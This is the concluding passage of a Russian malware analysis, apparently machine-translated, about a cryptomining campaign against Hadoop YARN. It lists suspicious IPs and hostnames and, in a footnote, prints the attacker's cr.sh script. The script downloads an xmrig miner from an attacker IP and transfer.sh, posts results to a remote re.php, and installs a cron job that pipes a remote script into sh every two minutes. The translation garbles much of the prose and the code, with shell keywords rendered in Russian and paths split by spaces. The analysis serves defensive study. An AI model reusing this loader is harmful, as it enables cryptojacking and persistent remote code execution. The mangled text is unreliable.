46.30.45.152 (vz230274.eurodir.ru) |
46.30.45.30 (shop.engine) |
46.30.45.91 (vz220153.eurodir.ru) |
46.30.47.115 (vz227413.eurodir.ru) |
46.30.47.157 (vz228859.eurodir.ru) |
95.142.39.109 (vz228627.eurodir.ru) |
95.142.39.151 (donotopen.ru) |
95.142.39.164 (vz232259.eurodir.ru) |
95.142.39.172 (hosting-by.wikhost.com) |
95.142.39.241 (shimshim.info) |
95.142.39.251 (vz232259.eurodir.ru) |
95.142.40.188 (vz232259.eurodir.ru) |
95.142.40.189 (vz232259.eurodir.ru) |
95.142.40.190 (vz232259.eurodir.ru) |
95.142.40.44 (vz229990.eurodir.ru) |
95.142.40.74 (vz232259.eurodir.ru) |
95.142.40.81 (vz228855.eurodir.ru) |
95.142.40.82 (vz228856.eurodir.ru) |
95.142.40.83 (vz228857.eurodir.ru) |
95.142.40.86 (kolos1952.ru) |
95.142.40.87 (regiister.ru) |
95.142.40.88 (buled.ru) |
95.142.40.89 (vz229526.eurodir.ru) |
95.142.39.233 (vz231616.eurodir.ru) |
185.154.53.46 (server.badstudio.ru) |
46.30.47.107 (vz227413.eurodir.ru) |
46.30.47.21 (vz227411.eurodir.ru) |
46.30.47.35 (vz227411.eurodir.ru) |
46.30.47.66 (vz227407.eurodir.ru) |
46.30.47.82 (vz227413.eurodir.ru) |
95.142.39.102 (vz222177.eurodir.ru) |
выводы
Для тех, кто пришел к концу, правильно сделать вывод, подчеркнув, как используются операционные системы стандарт таких как Ubuntu и Windows 7.
Весь процесс также был реплицирован на операционных системах, таких как упомянутые выше, с положительным результатом, и также можно предположить, что устройства IoT.
Я считаю, что очень сложно прервать или даже заметить подобную угрозу, если она адресована IoTs, отсутствие знаний об основных системах, отсутствие безопасности, но прежде всего ограниченные системы безопасности, которые мы можем использовать для управления использованием IoT. ежедневно.
К сожалению, я не проводил никаких тестов ни на одном IoT, поэтому не могу с уверенностью сказать о правильном функционировании всего описанного процесса.
Я хотел бы завершить провокацию, подчеркнув еще один аспект, касающийся использования cryptominer, На самом деле нельзя исключать, что Cyber Crime использует i cryptominer субсидировать кампании вредоносных программ гораздо более сложными, чем те, которые присущи APT12 также родительского происхождения, учитывая возможность самофинансирования с одобрения правительства, для которого работает «хакерская» группа или с кем она сотрудничает. Факторы, связанные с полной анонимностью от операций в домене Cyber, позволяют, высокие поля обман, делая такую деятельность особенно выгодной с точки зрения Интеллекта, благодаря способности легко управлять Операции ложного флага и "адрес«Отнесение к третьим лицам, которые не связаны с ними.
Наконец, окончательное рассмотрение проблемы, связанной с выполнением этих анализов. Трудность, которую читатели могли найти при чтении анализа, является зеркалом сложности ее выполнения, но если вы хотите играть с не маргинальной ролью в кибер-шахматной доске, важно иметь подготовленных и осведомленных людей, способных анализировать и реализовывать средства правовой защиты, необходимые для реальных систем, как правило, намного сложнее, чем тот, который я создал для образовательных целей.
1 HDFS: HDFS относится к распределенной файловой системе Hadoop. Это файловая система, созданная с помощью новой технологии с открытым исходным кодом, которая поддерживает иерархическую систему файлов и каталогов, которые распределяются по узлам хранения, управляемым Hadoop. Чтобы узнать больше: https: // www. zerounoweb.it/techtarget/searchdatacenter/hadoop-significa-rendere-piu-economico-il-big-data-management-ecco-come/
2 REST API: Интерфейс прикладного программирования. Репрезентативный перенос состояний. В целом это признаки разработчика кода, полезные для определения того, как данные, используемые приложением, должны быть переданы.
3 В общем, это называется медовым горшком, когда речь идет о чем-то, созданном специально для привлечения злоумышленника, на практике это ловушка, созданная для того, чтобы убедиться, что злоумышленник обнаружен.
4 Термин «добыча» обычно относится к выполнению вычислений для создания криптовалютности посредством выполнения сложных вычислений.
5 Сканер - это программа, которая автоматически сканирует сеть на наличие уязвимостей.
6 Скрипт - это не что иное, как файл, содержащий последовательность команд.
7 В частности, вы можете четко видеть, как загрузить и запустить вызванный скрипт cr.sh с IP-адреса 185.222.210.59 и вы используете команду sh & отречьсято есть процесс выполняется в экземпляре колотить тока терминала, в фон, но процесс отделен от списка работе di колотить (т.е. процесс не указан как работа в bash на переднем плане /фон); поэтому он используется для удаления / удаления заданий или для указания оболочке не отправлять сигнал HUP с помощью команды отказа от ответственности.
8 pkill -f криптонайт
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
#ps ax | grep / tmp / yarn | grep -v grep | xargs kill -9
Эта часть кода в основном касается процесса обработки данных добычи полезных ископаемых существующие, документы, подлежащие очистке, процессы, которые должны быть завершены, однако у нас сразу есть важный ключ, cryptonight (мы увидим позже).
WGET = "wget -O"
если [-s / usr / bin / curl];
тогда
WGET = "curl -o";
fi
если [-s / usr / bin / wget];
тогда
WGET = "wget -O";
fi
f2 = "185.222.210.59"
Эта вторая часть проверяет и назначает некоторые переменные, определяет, существуют ли команды виться e Wget и если да, назначьте их переменной WGET, f2 присваивает значение IP.
Фактически, f2 является одним из сервер используется для загрузки файлов, связанных с вредоносными действиями.
downloadIfNeed ()
{
если [! -f / tmp / java]; то
echo "Файл не найден!"
скачать
fi
если [-x "$ (команда -v md5sum)"]
тогда
sum = $ (md5sum / tmp / java | awk '{print $ 1}')
echo $ sum
$ sum дома в
c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242)
echo "Java OK"
;;
*)
echo "Java wrong"
sizeBefore = $ (du / tmp / java)
если [-s / usr / bin / curl];
тогда
WGET = "curl -k -o";
fi
если [-s / usr / bin / wget];
тогда
WGET = "wget --no-check-certificate -O";
fi
$ WGET / tmp / java https: // transfer.sh/ixQBE/zzz
sumAfter = $ (md5sum / tmp / java | awk '{print $ 1}')
если [-s / usr / bin / curl];
тогда
echo "повторно загружено $ sum $ sizeBefore после $ sumAfter" `du / tmp / java`> /tmp/tmp.txt
curl -F "file = @ /tmp/tmp.txt" http: //$f2/re.php
fi
;;
ESAC
еще
echo "Нет md5sum"
скачать
fi
}
загрузить () {
f1 = $ (завиток 185.222.210.59 / g.php)
если [-z "$ f1"];
тогда
f1 = $ (wget -q -O - 185.222.210.59 / g.php)
fi
если [`getconf LONG_BIT` =" 64 "]
тогда
$ WGET / tmp / java http: // $ f1 / xmrig_64
еще
$ WGET / tmp / java http: // $ f1 / xmrig_32
fi
}
если [! "$ (ps -fe | grep '/ tmp / java -c /tmp/w.conf' | grep -v grep)"];
тогда
downloadIfNeed
chmod + x / tmp / java
$ WGET /tmp/w.conf http: //$f2/w.conf
nohup / tmp / java -c /tmp/w.conf> / dev / null 2> & 1 &
спать 5
rm -rf /tmp/w.conf
еще
эхо "Бег"
fi
если crontab -l | grep -q "185.222.210.59"
тогда
эхо "Cron существует"
еще
эхо "Cron not found"
LDR = "wget -q -O -"
если [-s / usr / bin / curl];
тогда
LDR = "свернуться";
fi
если [-s / usr / bin / wget];
тогда
LDR = "wget -q -O -";
fi
(crontab -l 2> / dev / null; echo "* / 2 * * * * $ LDR http: // 185.222.210.59/cr.sh | sh> / dev / null 2> & 1") | crontab -
fi
Эта третья часть кода в основном определяет, является ли / tmp / java файлом, который существует и может быть записан, затем определите, соответствует ли значение MD5 одному из значений MD5, содержащихся в коде (мы увидим позже два хэш файл). в скрипт, назначается переменная LDR. Эта переменная используется в основном для загрузки каталога для хранения программ добычи полезных ископаемых и другие типы, используя команды wget или curl, в зависимости от того, присутствует ли команда в хост-системе. Эта часть кода является ядром кода, загружайте при необходимости (с помощью метода downloadIfNeed) и извлекает в каталоге / tmp renominado в java исполняемый файл для данным добычи полезных ископаемых (проверка с помощью getconf LONG_BIT, если исполняемый файл должен быть в 32 или 64 бит), загрузите конфигурационный файл w.conf, добавьте разрешения на выполнение программы добычи полезных ископаемых а затем выполняет команду nohup фон добычи полезных ископаемых (поЬир Это команда, которая делает игнорировать сигнал SIGHUP, таким образом, чтобы позволить продолжить выполнение даже в случае отключения от терминала или терминал закрытия эмулятора).
Запрограммируйте и удалите файл конфигурации, затем проверьте задачи в crontab, если подходящей задачи нет, она загрузит задачу для запуска скрипта "* / 2 * * * * $ LDR http: // 185.222.210.59/cr .sh | sh> / dev / null 2> & 1 ", где $ LDR - это wget -q -O - или curl (также упомянутый выше), задача запускается каждые две минуты (как показано на рисунке, показывающем варианты полей, определяющих частоту выполнения команды).
Lo скрипт содержит методы загрузки для нескольких вложенных вызовов. Метод ввода - downloadIfNeed. Указав лучше, основной функцией этого метода является проверка MD5 программы даты добычи полезных ископаемых существующий, если он не может быть проверен или файл не существует, непосредственно вызовите метод загрузки (в соответствии с методом, найденным в скрипт), чтобы загрузить программу добычи полезных ископаемых Если файл существует, но MD5 не совпадает правильно, вызовите метод загрузки. После повторной проверки, если проверка не удалась, попробуйте загрузить программу для майнинга с другого канала загрузки https: // transfer.sh/WoGXx/zzz и повторите попытку. Наконец, соответствующие результаты передаются на целевой сервер re.php $ f2.
Если оно существует, имя репликации - java.
Метод download () определяет, что система загружает соответствующую версию программы добычи полезных ископаемых со следующего веб-ресурса: http: // 185.222.210.59/g.php.
Ресурс возвращает другой IP-адрес для загрузки основного исполняемого файла, после завершения загрузки он снова проверяется и копия переименовывается в ppc.
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
crontab -l | sed '/ logo4 / d' | crontab -
crontab -l | sed '/ logo9 / d' | crontab -
crontab -l | sed '/ logo0 / d' | crontab -
В последней части сценария есть некоторые процессы, файлы, процессы очистки crontab, использование pkill для завершения процесса, который удовлетворяет условиям и устраняет некоторые действия crontab.
9 Информация с открытым исходным кодом
10 https:// community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html oppure https:// stackoverflow.com/questions/50520658/its-seem-that-the-yarn-is-infected-by-trojan-even-if-i-reinstall-my-computer
11 Удаленный вызов процедур, является общим механизмом управления приложениями клиент-сервер.
12 Advanced and Persistent Threath, тип атак, обычно выполняемых государственными организациями.
(фото: США)